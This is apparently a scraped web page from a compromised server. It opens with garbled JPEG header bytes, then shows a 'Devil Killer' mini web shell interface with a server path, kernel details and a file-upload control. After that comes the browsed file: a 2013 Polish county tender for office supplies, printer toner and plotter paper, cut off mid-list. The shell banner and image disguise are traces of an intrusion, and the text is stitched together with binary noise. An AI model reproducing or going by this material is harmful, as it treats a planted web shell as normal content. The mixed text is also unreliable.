JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130429/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130429/171362-N-2013.html

<p class="kh_header"><b>Nisko: Dostawa materiałów biurowych i papierniczych, materiałów eksploatacyjnych do drukarek i kserokopiarek oraz specjalistycznych materiałów papierniczych do ploterów dla potrzeb Starostwa Powiatowego w Nisku.</b><br>
<b>Numer ogłoszenia: 171362 - 2013; data zamieszczenia: 29.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl, poczta@powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych i papierniczych, materiałów eksploatacyjnych do drukarek i kserokopiarek oraz specjalistycznych materiałów papierniczych do ploterów dla potrzeb Starostwa Powiatowego w Nisku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Dostawa materiałów biurowych i papierniczych, materiałów eksploatacyjnych do drukarek i kserokopiarek oraz specjalistycznych materiałów papierniczych do ploterów dla potrzeb Starostwa Powiatowego w Nisku.
Dostawa materiałów biurowych i papierniczych realizowana będzie sukcesywnie w miarę potrzeb Zamawiającego, na podstawie szczegółowych zamówień do dnia 15 lipca 2013 r.
Zamówiona faxem dostawa musi być zrealizowana w ciągu 2 dni roboczych (za dni robocze uznaje się dni od poniedziałku do piątku) od momentu zgłoszenia zamówienia przez Zamawiającego, a w przypadkach wymagających natychmiastowej dostawy w ciągu  24 godzin od momentu zgłoszenia. Jeżeli termin realizacji dostawy przypada na dzień wolny od pracy dla Zamawiającego, termin ten upływa w następnym dniu roboczym Zamawiającego.
Zamówienie podzielone zostało na części:
Część I Dostawa materiałów biurowych i papierniczych (wg zestawienia). 
Załącznik A specyfikacja cenowa - materiały biurowe
Lp.
Nazwa materiału
Jedn.
ilość
1
Blok listowy A5, biały papier
szt
30
2
Blok listowy A4, biały papier
szt
30
3
Długopis czerwony
szt
30
4
Długopis żelowy t.gel pen dobrej jakości, niebieski, czarny (150/50 szt)
szt
200
5
Długopis zwykły dobrej jakości, niebieski, czarny (150/50szt)
szt
200
6
Długopis na sprężynce
szt
30
7
Dziurkacz min. 25  kartek, 
z wysuwanym ogranicznikiem
szt
10
8
Dysk CD R w obudowie t. slim
szt
150
9
Dysk DVD+ R  w obudowie t.slim
szt
20
10
Ekierka
szt
10
11
Etykiety samoprzylepne 70x37mm, 100 arkuszy, 2400 etykiet
opak
3
12
Foliopis permanentny 0,6 mm
szt
12
13
Folia do bindowania A4 (100szt)
opak
2
14
Fastykuła bezkwasowa A4, gramatura 1230g/m2
szt
100
15
Grzbiet do bindowania 165 kartek, kolor czarny, 19 mm (100szt)
opak
1
16
Gumki do ołówka, średnie
szt
20
17
Klipy biurowe 32mm (12szt)
opak
5
18
Klipy biurowe 25mm (12szt)
opak
5
19
Klipy biurowe 15mm (12szt) 
opak
5
20
Koperta C5, biała samoklejąca ( 500 szt)
opak
12
21
Koperta E4 z rozszerzonym dołem
szt
50
22
Koperta C 6, biała samoklejąca (1000 szt/)
opak
15
23
Koperta B4 , biała (250szt)
opak
4
24
Koperta A4, biała (250szt)
opak
4
25
Koperty bąbelkowe  do przesyłania dysków CD
szt
50
26
Korektor  w płynie, szybkoschnący 
z gąbką, 20 ml
szt
30
27
Kostka samoprzylepna kolorowa, 100kart, 38x51 mm (12 szt)
opak
10
28
Kostka samoprzylepna kolorowa 100 kart, 76x76 mm (6 szt)
opak
5
29
Koszulka foliowa A4 na dokumenty (100 szt)
opak
30
30
Kostka wielokolorowa luz 8,5 x 8,5 cm
szt
100
31
Klej biurowy wysokiej jakości, nie marszczący papieru, do papieru, fotografii, tektury t.Esselte , 17 g
szt
80
32
Linijka 20 cm
szt
20
33
Mechanizm skoroszytowy (wpinka)
szt
500
34
Nożyczki 21 cm, stalowe z rączką 
z tworzywa sztucznego   
szt
10
35
Okładka do bindowania A4 (100szt), czarna
opak
2
36
Ołówek zwykły HB, bez gumki
szt
24
37
Papier ksero A3, CIE 161, 80 g/m2 (500szt) załączyć certyfikat
ryza
50
38
Papier ksero A4, CIE 161, 80 g/m2 (500szt) załączyć certyfikat
ryza
1000
39
Płyta Blu-ray (5szt)
opak
2
40
Rolka termiczna 57x30 /10/
opak
6
41
Rozszywacz
szt
10
42
Segregator kolorowe A4, 50 mm t. Esselte
szt
200
43
Segregator kolorowe A4, 75 mm t. Esselte
szt
200
44
Skoroszyt zawieszkowy ? A4, biały, kartonowy, bezkwasowy
szt
250
45
Skoroszyt zawieszkowy A4, biały, kartonowy, bezkwasowy
szt
150
46
Skoroszyt oczkowy A4, biały, kartonowy, bezkwasowy
szt
300
47
Skoroszyt zwykły, biały A4 , bezkwasowy
szt
100
48
Skoroszyt plastikowy A4 , kolorowy
szt
100
49
Skoroszyt A4 twardy PCV z oczkami, kolorowy
szt
500
50
Spinacze metalowe okrągłe 28mm (100 szt)
opak
150
51
Taśma klejąca 24mm x 10m
szt
60
52
Tusz do stempli czerwony (dobry czerwony)
szt
10
53
Teczka papierowa wiązana A4 , biała na większą ilość dokumentów, bezkwasowa
szt
500
54
Zakładki indeksujące 8 x prostokąt 45 x 12,  kolorowe
szt
20
55
Zeszyt A4 z twarda okładką, kratka
szt
30
56
Zakreślacz kolorowy (żółty, zielony, pomarańczowy, czerwony)
szt
80
57
Zszywacz do min. 40 kartek
szt
10
58
Zszywki 24/6 t. Esselte (1000szt)
opak
200
Część II Dostawa materiałów eksploatacyjnych do kserokopiarek i drukarek
Załącznik B specyfikacja cenowa materiały eksploatacyjne do drukarek i kserokopiarek
 Lp.
      Nazwa przedmiotu
Jedn.
   Ilość
R O
1
Atrament  HP 3550 trójkolorowy, 8 ml
Szt.
4
2
Atrament  HP 3550,czarny,  10 ml
Szt.
8

3
Atrament HP 5652 czarny, 19 ml
Szt.
4

4
Atrament HP 5652 trójkolorowy, 17 ml
Szt.
2

5
Zestaw atramentów sublimacyjnych 6 kolorów 100ml do drukarki Epson P50
kpl
2

6
Zestaw atramentów 6 kolorów 100ml do drukarki Epson P50
kpl
3

7
Toner HP LJ 1100, 2500 kopii
Szt.
2

8
Toner HP LJ 2820 czarny, 5000 kopii
Szt.
1

9
Toner HP LJ 2820 kolor, 4000 kopii, c/m/y, 3 szt
kpl
1

10
Toner OKI C3450,kolor c/m/y 2500 kopii, 3 szt
kpl
1

11
Toner OKI C3450, czarny, 2500 kopii
Szt.
1

12
Toner OKI B  431d, 12000 kopii
Szt.
3
O
13
Toner Lexmark E120 , 2000 kopii 
Szt.
5
O
14
Toner Lexmark T640 czarny, 21000 kopii
Szt.
1

15
Toner Samsung ML 2571N, ML1610,  3000 kopii
Szt.
20

16
Toner Samsung ML1640, 1500 kopii
Szt.
3

17
Toner Samsung ML 3051 ND, 8000 kopii
Szt.
2

18
Toner Samsung ML 2955 DW, 2500 kopii
Szt.
2
O
19
Toner Dell 2230, 3500 kopii
Szt.
20

20
Toner  Dell 2330, 6000 kopii
Szt.
3
O
21
Toner Ricoh Aficio MP W2401
Szt.
2
O
22
Toner Ricoh  2016, 9000 kopii
Szt.
3

23
Toner Ricoh  2022, MP 2550 SPC, 2851 MP, 11 000 kopii
Szt.
8
O
24
Toner Ricoh 2050 PCL6, 10 000 kopii, czarny
Szt.
2
O
25
Toner Ricoh 2050 PCL6, kolor c/m/y, 9500 kopii
kpl
1
O
26
Toner Ricoh MPC2800, czarny 20 000 kopii
Szt.
1
O
27
Toner Ricoh MP C 3002, czarny, 20000 kopii
Szt.
1
O
28
Toner Ricoh MP C 3002, kolor c/m/y,  18000 kopii
kpl
1
O
29
Toner Ricoh Aficio SP C232SF, czarny  6500 kopii
Szt.
2

30
Toner Ricoh Aficio SP C232SF, kolor, c/m/y 6000 kopii
kpl
1

31
Toner fax Panasonic  KX-FAT 411E, 2000 kopii
Szt.
2
O
Część III Dostawa materiałów papierniczych do ploterów
Załącznik C specyfikacja cenowa materiały papiernicze do ploterów
LP.
Nazwa asortymentu
jedn. miary
ilość
1
Papier do plotera Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g/m2, 0,841 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
4
2
Papier do plotera Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g/m2, 0,594 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
4
3
Papier do plotera Ricoh Aficio MP W2401, wysoka biel, bezpyłowy 80g/m2, 0,420 x 175 m, średnica wewnętrzna rolki 7,6 cm
opak.
1
4
Papier do plotera HP 510 PS, wysoka biel, bezpyłowy 90g/m2, 0,841 x 110 m, średnica wewnętrzna rolki 5,1 cm
opak.
1
5
Papier do plotera HP 510 PS, wysoka biel, bezpyłowy 90g/m2, 0,594 x 110 m, średnica wewnętrzna rolki 5,1 cm
opak.
1
Wykonawca może złożyć ofertę na jedną dwie lub trzy części.
Szczegółowy opis potrzeb Zamawiającego został opisany powyżej wg zestawień poszczególnych części zamówienia. 
Wymagania odnośnie materiałów biurowych i papierniczych.
Dostarczany przedmiot zamówienia musi być nowy, fabrycznie opakowany, wolny od wad technicznych, jakościowo dobry oraz spełniać wymagania obowiązujących norm i przepisów. 
W przypadku gdy zamawiający dokonał opisu przedmiotu zamówienia w SIWZ przez wskazanie przykładowych znaków towarowych lub pochodzenia, wykonawcy mogą zaoferować materiały równoważne o parametrach tego typu, lecz nie gorszych od wskazanych. Materiały równoważne muszą być w ofercie wymienione z nazwy, a ciężar udowodnienia o zachowaniu parametrów wymaganych przez zamawiającego leży po stronie składającego ofertę.
Wymagania odnośnie materiałów eksploatacyjnych do kserokopiarek i drukarek.
Zamawiający nie dopuszcza materiałów eksploatacyjnych atramentów i tonerów posiadających pojemności startowe.
Zamawiający wymaga dostarczenia do kserokopiarek i drukarek oznaczonych  w zestawieniu lit. O, materiałów eksploatacyjnych oryginalnych, których producentem jest producent urządzenia, do którego mają zastosowanie.
Dostarczane materiały eksploatacyjne do drukarek i kserokopiarek atramenty i tonery oznaczone literką O w zestawieniu dostarczone jako oryginalne, muszą być fabrycznie nowe, do produkcji których nie użyto składników poprzednio eksploatowanych, uzupełnianych bądź przerabianych, ponadto muszą posiadać nienaruszone cechy pierwotnego opakowania umożliwiające identyfikacje, na opakowaniu winien być umieszczony znak firmowy i określenie pochodzenia (producenta) zawierający opis zawartości określający ilość, rodzaj i parametry techniczne bez konieczności naruszania opakowania oraz z wszelkimi zabezpieczeniami stosowanymi przez producentów (np. hologramy).
Zamawiający dopuszcza dostawę materiałów eksploatacyjnych równoważnych do oryginalnych. 
Przez materiał eksploatacyjny równoważny Zamawiający rozumie produkt wykonany z nowych elementów, kompatybilny ze sprzętem, do którego jest zamówiony, o parametrach takich samych bądź lepszych (pojemność atramentu/tonera, wydajność  i jakość wydruku) w stosunku do oryginału produkowanego przez producenta urządzenia.
Wykonawca w formularzu ofertowym w wolnej rubryce oznacza rodzaj dostarczanego materiału literą O - oryginalny a literką R - równoważny.  Nie oznaczenie pozycji uznane będzie jako dostawa materiałów oryginalnych.
Udowodnienie równoważności oferowanych materiałów będzie leżało po stronie Wykonawcy.  
Wykonawca bierze na siebie pełną odpowiedzialność za uszkodzenia sprzętu spowodowane używaniem zaoferowanych materiałów.
W przypadku uszkodzenia urządzenia, którego przyczyną będzie użycie dostarczanych materiałów eksploatacyjnych innych niż pochodzące od producenta sprzętu, Wykonawca zobowiązany będzie do zwrotu kosztów naprawy urządzenia lub naprawy w autoryzowanym serwisie producenta a w przypadku takiej konieczności - zwrotu kosztów zleconej przez Zamawiającego ekspertyzy rzeczoznawcy.
Jeżeli w trakcie umowy Zamawiający stwierdzi, iż wydajność, jakość lub niezawodność dostarczonych produktów niekorzystnie odbiega od parametrów produktu oryginalnego (pochodzącego od producenta urządzenia, do którego materiał jest kupowany) lub jeśli produkt nie sygnalizuje we właściwy sposób zużycia atramentu lub tonera, Wykonawca na żądanie zamawiającego winien oferowany towar wymienić na spełniający wymagania Zamawiającego bez zmiany ceny.
Termin przydatności do użytku nie może być krótszy niż 12 miesięcy od daty dostawy.
Wykonawca zobowiązany jest dostarczyć przedmiot zamówienia własnym środkiem transport do Starostwa Powiatowego w Nisku.
Na dostarczone materiały biurowe, papiernicze i materiały eksploatacyjne oraz specjalistyczne materiały papiernicze do ploterów Wykonawca udziela 12 miesięcznej gwarancji liczonej od dnia dostawy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.21.13-6, 30.12.51.10-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia (załącznik nr 2 do SIWZ),</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku. Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu. Wykonawca potwierdza spełnienie warunku poprzez złożenie oświadczenia  (załącznik nr 2 do SIWZ),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (załącznik nr 1 do SIWZ) wraz z załącznikami 2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt III.4.3.1. Zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące przypadki i warunki zmiany umowy zmniejszenie zakresu przedmiotu zamówienia gdy jego wykonanie w pierwotnym zakresie nie leży w interesie Zamawiającego w granicach uzasadnionego interesu Zamawiającego, zmiany terminu realizacji przedmiotu zamówienia, w przypadku: gdy wykonanie zamówienia w określonym pierwotnie terminie nie leży w interesie Zamawiającego w zakresie uzasadnionego interesu Zamawiającego, wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia, zaistnienia okoliczności (technicznych, gospodarczych itp.) których nie można było przewidzieć chwili zawarcia umowy, konieczności zmiany osób przewidzianych  do wykonania przedmiotu umowy, wprowadzenia nowej technologii lub innych okoliczności pozwalających na obniżenie ceny przedmiotu umowy, Wykonawca może ją odpowiednio obniżyć,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2,  37 - 400 Nisko - Wydział Gospodarki Mieniem Powiatu..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2013 godzina 10:45, miejsce: Starostwo Powiatowe w Nisku. Pl. Wolności 2, 37 - 400 Nisko w Biurze Obsługi Interesanta (pok. nr 1).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów biurowych i papierniczych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.
Nazwa materiału
Jedn.
ilość
1
Blok listowy A5, biały papier
szt
30
2
Blok listowy A4, biały papier
szt
30
3
Długopis czerwony
szt
30
4
Długopis żelowy t.gel pen dobrej jakości, niebieski, czarny (150/50 szt)
szt
200
5
Długopis zwykły dobrej jakości, niebieski, czarny (150/50szt)
szt
200
6
Długopis na sprężynce
szt
30
7
Dziurkacz min. 25  kartek, 
z wysuwanym ogranicznikiem
szt
10
8
Dysk CD R w obudowie t. slim
szt
150
9
Dysk DVD+ R  w obudowie t.slim
szt
20
10
Ekierka
szt
10
11
Etykiety samoprzylepne 70x37mm,  100 arkuszy, 2400 etykiet
opak
3
12
Foliopis permanentny 0,6 mm
szt
12
13
Folia do bindowania A4 (100szt)
opak
2
14
Fastykuła bezkwasowa A4, gramatura 1230g/m2
szt
100
15
Grzbiet do bindowania 165 kartek, kolor czarny, 19 mm (100szt)
opak
1
16
Gumki do ołówka, średnie
szt
20
17
Klipy biurowe 32mm (12szt)
opak
5
18
Klipy biurowe 25mm (12szt)
opak
5
19
Klipy biurowe 15mm (12szt) 
opak
5
20
Koperta C5, biała samoklejąca ( 500 szt)
opak
12
21
Koperta E4 z rozszerzonym dołem
szt
50
22
Koperta C 6, biała samoklejąca (1000 szt/)
opak
15
23
Koperta B4 , biała (250szt)
opak
4
24
Koperta A4, biała (250szt)
opak
4
25
Koperty  bąbelkowe  do przesyłania dysków CD
szt
50
26
Korektor  w płynie, szybkoschnący 
z gąbką, 20 ml
szt
30
27
Kostka samoprzylepna kolorowa, 100kart, 38x51 mm (12 szt)
opak
10
28
Kostka samoprzylepna kolorowa 100 kart, 76x76 mm (6 szt)
opak
5
29
Koszulka foliowa A4 na dokumenty (100 szt)
opak
30
30
Kostka wielokolorowa luz 8,5 x 8,5 cm
szt
100
31
